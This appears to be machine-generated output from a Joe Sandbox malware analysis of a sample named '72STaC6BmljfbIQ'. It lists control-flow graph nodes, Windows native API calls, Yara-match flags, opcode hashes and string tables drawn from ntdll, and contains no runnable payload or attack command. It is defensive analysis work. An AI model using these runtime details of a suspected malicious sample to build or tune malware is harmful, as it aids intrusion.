                                                                                                      • Snapshot File: hcaresult_0_2_6d50000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9b2832a3dc0d024821193ff2d8393cce109f9dafc4931b81d71ab480e5a19735
                                                                                                      • Instruction ID: 01f32d5377ab9b085b63e9ce413f7ec60eb980ced14379bdd28f20fd5e350e49
                                                                                                      • Opcode Fuzzy Hash: 9b2832a3dc0d024821193ff2d8393cce109f9dafc4931b81d71ab480e5a19735
                                                                                                      • Instruction Fuzzy Hash: D5511A70E042598FDB14CFA9D5816AEFBF2FF89304F24816AD818A7715D7349942CFA1

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:1.3%
                                                                                                      Dynamic/Decrypted Code Coverage:5.3%
                                                                                                      Signature Coverage:8.3%
                                                                                                      Total number of Nodes:132
                                                                                                      Total number of Limit Nodes:10

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 517 417813-41783c call 42f3b3 520 417842-417850 call 42f9b3 517->520 521 41783e-417841 517->521 524 417860-417871 call 42de53 520->524 525 417852-41785d call 42fc53 520->525 530 417873-417887 LdrLoadDll 524->530 531 41788a-41788d 524->531 525->524 530->531
                                                                                                      APIs
                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417885
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_72STaC6BmljfbIQ.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Load
                                                                                                      • String ID:
                                                                                                      • API String ID: 2234796835-0
                                                                                                      • Opcode ID: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                                                                      • Instruction ID: 05a5680942dabe8a321efdcf2b6f82430579c081dca23c65dcb556c1d755013b
                                                                                                      • Opcode Fuzzy Hash: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                                                                      • Instruction Fuzzy Hash: 8A0152B1E4010DB7DB10EAA1DC42FDEB3789B14308F4081A6E90897240F674EB48CB95

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 537 42c743-42c779 call 404583 call 42d943 NtClose
                                                                                                      APIs
                                                                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C774
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_72STaC6BmljfbIQ.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID:
                                                                                                      • API String ID: 3535843008-0
                                                                                                      • Opcode ID: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                                                                      • Instruction ID: 9e0658677882e74928744a82f9e72dba2eb639633bc470e9b9a98b36903aceda
                                                                                                      • Opcode Fuzzy Hash: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                                                                      • Instruction Fuzzy Hash: 63E04F752002147BC610EA5AEC41E9B775CDFC5724F004419FA48A7241CA75BA11C6A4
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: da173bf847d935c84a3bbf18d7cc32829601613df7c660ceb41b7bb5d719c80e
                                                                                                      • Instruction ID: 1fa837aa741d1e1e33eae37a04eb7f571862644d69e7d78882d37966da9d2894
                                                                                                      • Opcode Fuzzy Hash: da173bf847d935c84a3bbf18d7cc32829601613df7c660ceb41b7bb5d719c80e
                                                                                                      • Instruction Fuzzy Hash: 5690026520241003410971584514616401A97E0201B55C021E1015590DC62589916226
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 6b454817d9cbf4caa480fdc7273c9d9e1f7015e48ed4b1df7ab72c5c17bca6b3
                                                                                                      • Instruction ID: 10f5023dafbd75a6c93424c35efb9070117c1a3715903d67ebfa6f485c7db155
                                                                                                      • Opcode Fuzzy Hash: 6b454817d9cbf4caa480fdc7273c9d9e1f7015e48ed4b1df7ab72c5c17bca6b3
                                                                                                      • Instruction Fuzzy Hash: 3F90023520141413D11571584604707001997D0241F95C412E0425558DD7568A52A222
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 83ca26cf003013b23479e1b4b8f545e72c28fe348ce848828effd64b07eac9cc
                                                                                                      • Instruction ID: d41869fc8749cd7b5704d2e3bca042a7fc5061ce87a51b42991f201e683db864
                                                                                                      • Opcode Fuzzy Hash: 83ca26cf003013b23479e1b4b8f545e72c28fe348ce848828effd64b07eac9cc
                                                                                                      • Instruction Fuzzy Hash: DD90023520149802D1147158850474A001597D0301F59C411E4425658DC79589917222
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: ee05a24cfcae0d1909b27ff0708d1370073a3aa8039f52e50b35c742aae2679d
                                                                                                      • Instruction ID: d2937d0265d4de630469f33fbf60ff095eb1325efff43d668267c2e8bbe913b3
                                                                                                      • Opcode Fuzzy Hash: ee05a24cfcae0d1909b27ff0708d1370073a3aa8039f52e50b35c742aae2679d
                                                                                                      • Instruction Fuzzy Hash: 4090023560551402D10471584614706101597D0201F65C411E0425568DC7958A5166A3

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 132 414119-414120 133 414122-414129 132->133 134 4140a6-4140b4 132->134 137 41412b-41412f 133->137 135 4140ba-4140f1 call 4044f3 call 424f53 134->135 136 4140b5 call 417813 134->136 149 414113-414118 135->149 150 4140f3-414104 PostThreadMessageW 135->150 136->135 139 414131-414136 137->139 140 41414d-414153 137->140 139->140 142 414138-41413d 139->142 140->137 143 414155-414158 140->143 142->140 145 41413f-414146 142->145 147 414159-41415c 145->147 148 414148-41414b 145->148 148->140 148->147 150->149 151 414106-414110 150->151 151->149
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_72STaC6BmljfbIQ.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 40F193-3PQ$40F193-3PQ
                                                                                                      • API String ID: 1836367815-1005098266
                                                                                                      • Opcode ID: c6518daae546de9adca5e6c6ca355c75d1bb2b16d27b4bf47e46c483232480bd
                                                                                                      • Instruction ID: 26a48773d49b5d4830db5d6a3abe6c0441e01ffa8e7dd764610f6d3443abad5e
                                                                                                      • Opcode Fuzzy Hash: c6518daae546de9adca5e6c6ca355c75d1bb2b16d27b4bf47e46c483232480bd
                                                                                                      • Instruction Fuzzy Hash: F5117B31D0024879EB309E708C05FEF6B654BD2764F48829AFE14AB3D2D77949C28788

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 152 41406f-414070 153 414072-41407a 152->153 154 41408f-4140f1 call 42e873 call 42f283 call 417813 call 4044f3 call 424f53 152->154 165 414113-414118 154->165 166 4140f3-414104 PostThreadMessageW 154->166 166->165 167 414106-414110 166->167 167->165
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_72STaC6BmljfbIQ.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 40F193-3PQ$40F193-3PQ
                                                                                                      • API String ID: 1836367815-1005098266
                                                                                                      • Opcode ID: 8d5fe0c3c9cdc8e49817f3f7c81564a0f05defde10c584dc7b50df3ffdad5cdd
                                                                                                      • Instruction ID: 0f7a8f7452082f141b53ab21a3766a0a1486675bc0825100db931c7ccd50f644
                                                                                                      • Opcode Fuzzy Hash: 8d5fe0c3c9cdc8e49817f3f7c81564a0f05defde10c584dc7b50df3ffdad5cdd
                                                                                                      • Instruction Fuzzy Hash: BA01DF32E4521876E7209791AC02FDEB7689F81B14F40815AFF147B381D6795A0247D9

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 168 41407c-414093 170 41409c-4140f1 call 42f283 call 417813 call 4044f3 call 424f53 168->170 171 414097 call 42e873 168->171 180 414113-414118 170->180 181 4140f3-414104 PostThreadMessageW 170->181 171->170 181->180 182 414106-414110 181->182 182->180
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_72STaC6BmljfbIQ.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 40F193-3PQ$40F193-3PQ
                                                                                                      • API String ID: 1836367815-1005098266
                                                                                                      • Opcode ID: f97a2dbf0e9be62fbf43441762b2e807058933e57bce9d2d8aa05f467568e6ba
                                                                                                      • Instruction ID: 087d0fd33435a02eb29b34bb39c81c2954cd161ddf22aaec2d78f1b904196256
                                                                                                      • Opcode Fuzzy Hash: f97a2dbf0e9be62fbf43441762b2e807058933e57bce9d2d8aa05f467568e6ba
                                                                                                      • Instruction Fuzzy Hash: 9E112F31E40218B6EB2197E18C02FDF7B7C8F81B44F408069FA047B2C1D7B85A0687E5

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 183 414083-414093 184 41409c-4140f1 call 42f283 call 417813 call 4044f3 call 424f53 183->184 185 414097 call 42e873 183->185 194 414113-414118 184->194 195 4140f3-414104 PostThreadMessageW 184->195 185->184 195->194 196 414106-414110 195->196 196->194
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_72STaC6BmljfbIQ.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 40F193-3PQ$40F193-3PQ
                                                                                                      • API String ID: 1836367815-1005098266
                                                                                                      • Opcode ID: e6ba9eb905182b9ec34c9235bf651bffb639cd546324c055ce8da76e89865faa
                                                                                                      • Instruction ID: 5cdb5b93b2f758ed905246f69099698f9d56dcfdbf049b8bc6d5a2d33433c103
                                                                                                      • Opcode Fuzzy Hash: e6ba9eb905182b9ec34c9235bf651bffb639cd546324c055ce8da76e89865faa
                                                                                                      • Instruction Fuzzy Hash: FA012B31D40218B6EB20A7E18C02FDF7B7C8F81B44F008059FA047B2C1D7B8560687E9

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 472 42ca93-42cad1 call 404583 call 42d943 RtlFreeHeap
                                                                                                      APIs
                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CACC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_72STaC6BmljfbIQ.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FreeHeap
                                                                                                      • String ID: neA
                                                                                                      • API String ID: 3298025750-2757349852
                                                                                                      • Opcode ID: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                                                                      • Instruction ID: 9121e88aff0d49045895fe5efa263953fc4bc90d71136d3efce1da578365df1c
                                                                                                      • Opcode Fuzzy Hash: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                                                                      • Instruction Fuzzy Hash: 45E092B22042147BD610EF59EC41E9B37ADEFC8710F004419FE09A7242C771B9108BB4

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 532 42ca53-42ca91 call 404583 call 42d943 RtlAllocateHeap
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(?,0041E604,?,?,00000000,?,0041E604,?,?,?), ref: 0042CA8C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_72STaC6BmljfbIQ.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                                                                      • Instruction ID: 2033942cd3b101f58bf4d77c2136ec80b735e96d56796e01d22862b954715158
                                                                                                      • Opcode Fuzzy Hash: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                                                                      • Instruction Fuzzy Hash: 7CE06DB12442047BDA10EE59EC42E9B37ADDFC4710F004419FA08A7241DA71B95087B4
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,53EC9B57,?,?,53EC9B57), ref: 0042CB07
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_72STaC6BmljfbIQ.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 621844428-0
                                                                                                      • Opcode ID: e026587fc2ca3ee475d83143d77eba9ec23cbd0096a79b0590467f2d36563e8f
                                                                                                      • Instruction ID: 4f7d0579f0d3a644c73c2585b10cf1452984b28a7a8af53eb300c7de9d046712
                                                                                                      • Opcode Fuzzy Hash: e026587fc2ca3ee475d83143d77eba9ec23cbd0096a79b0590467f2d36563e8f
                                                                                                      • Instruction Fuzzy Hash: CBE046722002147BC620AA6AEC05F9BB76CDBC5724F00441AFB0CAB282DA75BA0187A4
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 62599f371aa306ec3fab32d35960573db7fd628a6b0a69ceafc273b19a8874c4
                                                                                                      • Instruction ID: bdc0dbe846a975e7cebff4f6a6507c02b87ab3cb998b1761fa62cbb6fbe56fa1
                                                                                                      • Opcode Fuzzy Hash: 62599f371aa306ec3fab32d35960573db7fd628a6b0a69ceafc273b19a8874c4
                                                                                                      • Instruction Fuzzy Hash: 0AB09B719015D5C6DA15E7A44708717791077D0701F25C065D2030641F4738C1D1E276
                                                                                                      Strings
                                                                                                      • *** Inpage error in %ws:%s, xrefs: 01238EC8
                                                                                                      • The resource is owned shared by %d threads, xrefs: 01238E2E
                                                                                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01238F34
                                                                                                      • The instruction at %p tried to %s , xrefs: 01238F66
                                                                                                      • Go determine why that thread has not released the critical section., xrefs: 01238E75
                                                                                                      • This failed because of error %Ix., xrefs: 01238EF6
                                                                                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01238E4B
                                                                                                      • write to, xrefs: 01238F56
                                                                                                      • The resource is owned exclusively by thread %p, xrefs: 01238E24
                                                                                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01238F26
                                                                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01238DD3
                                                                                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01238FEF
                                                                                                      • *** enter .cxr %p for the context, xrefs: 01238FBD
                                                                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01238DB5
                                                                                                      • The instruction at %p referenced memory at %p., xrefs: 01238EE2
                                                                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01238E3F
                                                                                                      • an invalid address, %p, xrefs: 01238F7F
                                                                                                      • a NULL pointer, xrefs: 01238F90
                                                                                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01238F2D
                                                                                                      • *** enter .exr %p for the exception record, xrefs: 01238FA1
                                                                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 01238F3F
                                                                                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 01238E02
                                                                                                      • read from, xrefs: 01238F5D, 01238F62
                                                                                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01238E86
                                                                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01238D8C
                                                                                                      • The critical section is owned by thread %p., xrefs: 01238E69
                                                                                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01238DA3
                                                                                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01238DC4
                                                                                                      • *** then kb to get the faulting stack, xrefs: 01238FCC
                                                                                                      • <unknown>, xrefs: 01238D2E, 01238D81, 01238E00, 01238E49, 01238EC7, 01238F3E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • API String ID: 0-108210295
                                                                                                      • Opcode ID: f0ba720239cb675e0bfa2fbe36ead5a582778ec7c89355d718b57d93918965e1
                                                                                                      • Instruction ID: d45806d81af48933475dd054fc96b11d3ed0d1050c8d4b11479209be52b04f18
                                                                                                      • Opcode Fuzzy Hash: f0ba720239cb675e0bfa2fbe36ead5a582778ec7c89355d718b57d93918965e1
                                                                                                      • Instruction Fuzzy Hash: 2C8119B5A74215BFDB2AAB19CC4AE7B3F35EF96B10F050248F6046F252E3B58401D762
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-2160512332
                                                                                                      • Opcode ID: 78e824d5d890c98b89902fe01609bd59c407723a1a4b43221ffc4944ba396ad8
                                                                                                      • Instruction ID: 4288efe51a4ab1cf5b4f4699db283d14c95145db6c2e810db40776e5ff77928e
                                                                                                      • Opcode Fuzzy Hash: 78e824d5d890c98b89902fe01609bd59c407723a1a4b43221ffc4944ba396ad8
                                                                                                      • Instruction Fuzzy Hash: F6929271624742DFE726CF18C888B6BB7E8BB84754F044A1EFA94D7292D770E844CB52
                                                                                                      Strings
                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011F540A, 011F5496, 011F5519
                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011F54CE
                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011F54E2
                                                                                                      • Critical section address., xrefs: 011F5502
                                                                                                      • Critical section debug info address, xrefs: 011F541F, 011F552E
                                                                                                      • Invalid debug info address of this critical section, xrefs: 011F54B6
                                                                                                      • undeleted critical section in freed memory, xrefs: 011F542B
                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 011F5543
                                                                                                      • double initialized or corrupted critical section, xrefs: 011F5508
                                                                                                      • Thread identifier, xrefs: 011F553A
                                                                                                      • Critical section address, xrefs: 011F5425, 011F54BC, 011F5534
                                                                                                      • 8, xrefs: 011F52E3
                                                                                                      • corrupted critical section, xrefs: 011F54C2
                                                                                                      • Address of the debug info found in the active list., xrefs: 011F54AE, 011F54FA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • API String ID: 0-2368682639
                                                                                                      • Opcode ID: b710a75f5975da9e31b7cf18edc57cc56a0d510a6f906fc4e757db5f5e07bd29
                                                                                                      • Instruction ID: 29b2189cfa84ca2e4f9fc4bf9223d312ae7c79eba3feea08400c8cd58e7234b1
                                                                                                      • Opcode Fuzzy Hash: b710a75f5975da9e31b7cf18edc57cc56a0d510a6f906fc4e757db5f5e07bd29
                                                                                                      • Instruction Fuzzy Hash: 2381ADB1A40359EFDB68CF99C845BAEBBBAFB48B14F20411DF604B7650D371A941CB60
                                                                                                      Strings
                                                                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 011F261F
                                                                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 011F2602
                                                                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 011F2412
                                                                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 011F2506
                                                                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011F25EB
                                                                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011F22E4
                                                                                                      • @, xrefs: 011F259B
                                                                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 011F2409
                                                                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 011F2498
                                                                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011F24C0
                                                                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 011F2624
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • API String ID: 0-4009184096
                                                                                                      • Opcode ID: 246bb3a9c5de41cfb62f77b45acfd6d7ad27a01ff3b51f3b6bbcdf78716f1082
                                                                                                      • Instruction ID: 818bfba3cd7109edaa4554f3fd8b87b618b50dd5c215031a81312f5a77c406df
                                                                                                      • Opcode Fuzzy Hash: 246bb3a9c5de41cfb62f77b45acfd6d7ad27a01ff3b51f3b6bbcdf78716f1082
                                                                                                      • Instruction Fuzzy Hash: A90270F1D042299BDB39DB54CD80BE9B7B8AB54704F0141DAEB09A7241DB70AF88CF59
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                      • API String ID: 0-2515994595
                                                                                                      • Opcode ID: 3898fb61eaf6ecb96b6dd8c52c65da877fdc7025bb3268967fe02647a72ab599
                                                                                                      • Instruction ID: 2ef0fa6c3c8e18d441357ebe815420a9e8b95e5bd3c3768f8c989257289da071
                                                                                                      • Opcode Fuzzy Hash: 3898fb61eaf6ecb96b6dd8c52c65da877fdc7025bb3268967fe02647a72ab599
                                                                                                      • Instruction Fuzzy Hash: DD51D171124322ABC32DDF288845BAFBBE8EF98654F54491DFA55C3290E770D608CB92
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                      • API String ID: 0-3197712848
                                                                                                      • Opcode ID: 74e2552ff357814fd0d5f55f65b6cbc8bcd931863a7cd3357ceb23e98b139dff
                                                                                                      • Instruction ID: 4e8ec9be2ed3846323b8d3427f43d1a305e3390f02a64c417d8d3d02104d6cfe
                                                                                                      • Opcode Fuzzy Hash: 74e2552ff357814fd0d5f55f65b6cbc8bcd931863a7cd3357ceb23e98b139dff
                                                                                                      • Instruction Fuzzy Hash: 3C12D0716087528FDB2DDB28D444BABBBE4BF84708F09051DF9A58B291E734D948CB93
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
